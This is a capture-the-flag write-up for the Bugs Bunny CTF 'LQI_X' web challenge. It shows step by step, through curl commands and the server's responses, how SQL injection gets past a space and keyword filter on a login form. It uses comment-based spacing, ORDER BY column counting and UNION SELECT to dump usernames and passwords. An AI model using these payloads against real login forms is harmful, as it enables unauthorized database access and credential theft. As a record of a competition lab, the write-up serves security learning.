[Web] Bugs Bunny CTF - LQI_X 140

Web filterbypass, sqli, web Comments

LQI_X
140

Its for your , login and get all you need

task : http://34.253.165.46/LQI_X/

Author: TnMch

We have login form so lets start by doing some tests with curl at the GET parameter username:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -L "http://34.253.165.46/LQI_X/?username=test'&password=" -v
*   Trying 34.253.165.46...
* TCP_NODELAY set
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test'&password= HTTP/1.1
> Host: 34.253.165.46
> User-Agent: curl/7.52.1
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Wed, 02 Aug 2017 10:27:30 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 749
< Content-Type: text/html; charset=UTF-8
< 


<!DOCTYPE html>
<html>

<head>

  <meta charset="UTF-8">

  <title>SQLI-F - Log-in</title>

  <link rel='stylesheet' href='http://codepen.io/assets/libs/fullpage/jquery-ui.css'>

    <link rel="stylesheet" href="css/style.css" media="screen" type="text/css" />

</head>

<body>

  <div class="login-card">
    <h1>Log-in</h1><br>
  <form method="GET" action="">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="login" class="login login-submit" value="login">
  </form>

  <div class="login-help">
    <p> </p>
  </div>
</div>

  <script src='http://codepen.io/assets/libs/fullpage/jquery_and_jqueryui.js'></script>

</body>

</html>

Nothing seems to be Changing lets try with password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

curl -L "http://34.253.165.46/LQI_X/?username=test&password=test'%20or%201=1--" -v
*   Trying 34.253.165.46...
* TCP_NODELAY set
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test&password=test'%20or%201=1-- HTTP/1.1
> Host: 34.253.165.46
> User-Agent: curl/7.52.1
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Wed, 02 Aug 2017 10:32:28 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 12
< Content-Type: text/html; charset=UTF-8
< 
* Curl_http_done: called premature == 0
* Connection #0 to host 34.253.165.46 left intact
No way SOrry

Wow a custom error message? they must be filtering some characters or even words… Maybe its the spaces, lets try to use the comment technique to bypass space filtering:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/or/**/1=1--" -v
*   Trying 34.253.165.46...
* TCP_NODELAY set
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test&password=test'/**/or/**/1=1-- HTTP/1.1
> Host: 34.253.165.46
> User-Agent: curl/7.52.1
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Wed, 02 Aug 2017 10:37:24 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 753
< Content-Type: text/html; charset=UTF-8
< 


<!DOCTYPE html>
<html>

<head>

  <meta charset="UTF-8">

  <title>SQLI-F - Log-in</title>

  <link rel='stylesheet' href='http://codepen.io/assets/libs/fullpage/jquery-ui.css'>

    <link rel="stylesheet" href="css/style.css" media="screen" type="text/css" />

</head>

<body>

  <div class="login-card">
    <h1>Log-in</h1><br>
  <form method="GET" action="">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="login" class="login login-submit" value="login">
  </form>

  <div class="login-help">
    <p> test</p>
  </div>
</div>

  <script src='http://codepen.io/assets/libs/fullpage/jquery_and_jqueryui.js'></script>

</body>

</html>

It works! now lets use order by to see how many values are returned to know how many columns we will use on our union query injection. Using CURL with I option to check the status code from the request so if the query returns an error we will get a 500 (Internal Error) if not we get a 200 (OK)

1
2
3
4
5
6
7
8
9
10
11
12
13

(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -I "http://34.253.165.46/LQI_X/?username=test&password=test'/**/order/**/by/**/1--"
HTTP/1.1 200 OK
Date: Wed, 02 Aug 2017 10:43:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8

(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -I "http://34.253.165.46/LQI_X/?username=test&password=test'/**/order/**/by/**/2--"
HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Aug 2017 10:43:03 GMT
Server: Apache/2.4.18 (Ubuntu)
Connection: close
Content-Type: text/html; charset=UTF-8

As we can see the sql query is only selecting one column the real query must be something similar to this “Select username from table_users where username=%s and password=%s”. Now injecting with union:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

 curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/1--"


<!DOCTYPE html>
<html>

<head>

  <meta charset="UTF-8">

  <title>SQLI-F - Log-in</title>

  <link rel='stylesheet' href='http://codepen.io/assets/libs/fullpage/jquery-ui.css'>

    <link rel="stylesheet" href="css/style.css" media="screen" type="text/css" />

</head>

<body>

  <div class="login-card">
    <h1>Log-in</h1><br>
  <form method="GET" action="">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="login" class="login login-submit" value="login">
  </form>

  <div class="login-help">
    <p> 1</p>
  </div>
</div>

  <script src='http://codepen.io/assets/libs/fullpage/jquery_and_jqueryui.js'></script>

</body>

</html>

It worked! as you can see at the image above the number “1” showed up now what I tryed after this was getting the table names from information_schema but somehow I wasn’t able to do it so I tried to guess the obvious names, assumed that the table name is users and the columns probably id,username and password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/0,1-- HTTP/1.1
... 
  <div class="login-help">
    <p> 1</p>
  </div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/1,1--"
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/1,1-- HTTP/1.1
... 
  <div class="login-help">
    <p> 2</p>
  </div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/2,1--"
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/2,1-- HTTP/1.1
... 
  <div class="login-help">
    <p> 3</p>
  </div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/3,1--"
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/3,1-- HTTP/1.1
... 
  <div class="login-help">
    <p> 4</p>
  </div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/4,1--"
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/4,1-- HTTP/1.1
... 
  <div class="login-help">
    <p> 5</p>
  </div>
</div>
...

As we can see we were successful to leak the ids from the users now lets try with the password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/0,1--"
....
  <div class="login-help">
    <p> _Easy_I_Dont_Think</p>
  </div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/1,1--"
....
  <div class="login-help">
    <p> hello</p>
  </div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/2,1--"
....
  <div class="login-help">
    <p> here</p>
  </div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/3,1--"
....
  <div class="login-help">
    <p> test</p>
  </div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/4,1--"
....
  <div class="login-help">
    <p> }</p>
  </div>
....

With changing the limit we leaked all the passwords from the users as we can see the first user gave us an incomplete flag the others don’t seem to be part of the flag since there isn’t any “_” separating the words so lets assume our flag ends like “_Easy_I_Dont_Think}”.
The rest of the flag must be in the username column!

1
2
3

kinyabitch@Debian ~/D/H/ctf> curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/username/**/from/**/users/**/limit/**/0,1--"
No way SOrry

Fuck they are filtering the username too? wee need another technique to get the username field! Lets try to make the query always true! and then inject an union query:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/0,1/**/--"
...
<div class="login-help">
    <p> Bugs_Bunny{SQLi_Easy_!!</p>
</div>
...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/1,1/**/--"
...
<div class="login-help">
    <p> a</p>
  </div>
...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/2,1/**/--"
...
 <div class="login-help">
    <p> flag_is</p>
  </div>

...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/3,1/**/--"
...
  <div class="login-help">
    <p> hello</p>
  </div>
...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/4,1/**/--"
...
<div class="login-help">
    <p> so_2017!</p>
</div>
...

The flag is the combination of the some of this strings after some trial and error trying to login I could see that the login table is:

1
2
3
4
5
6
7
8

Users
id username                password
1  hello                   hello
2  flag_is                 here            
3  Bugs_Bunny{SQLi_Easy_!! _Easy_I_Dont_Think
4  so_2017!                } 
5  test                    test

So the flag is Bugs_Bunny{SQLi_Easy_!!_Easy_I_Dont_Thinkso_2017!}

TeamRocketISTCTF Team

Portuguese Computer Science Students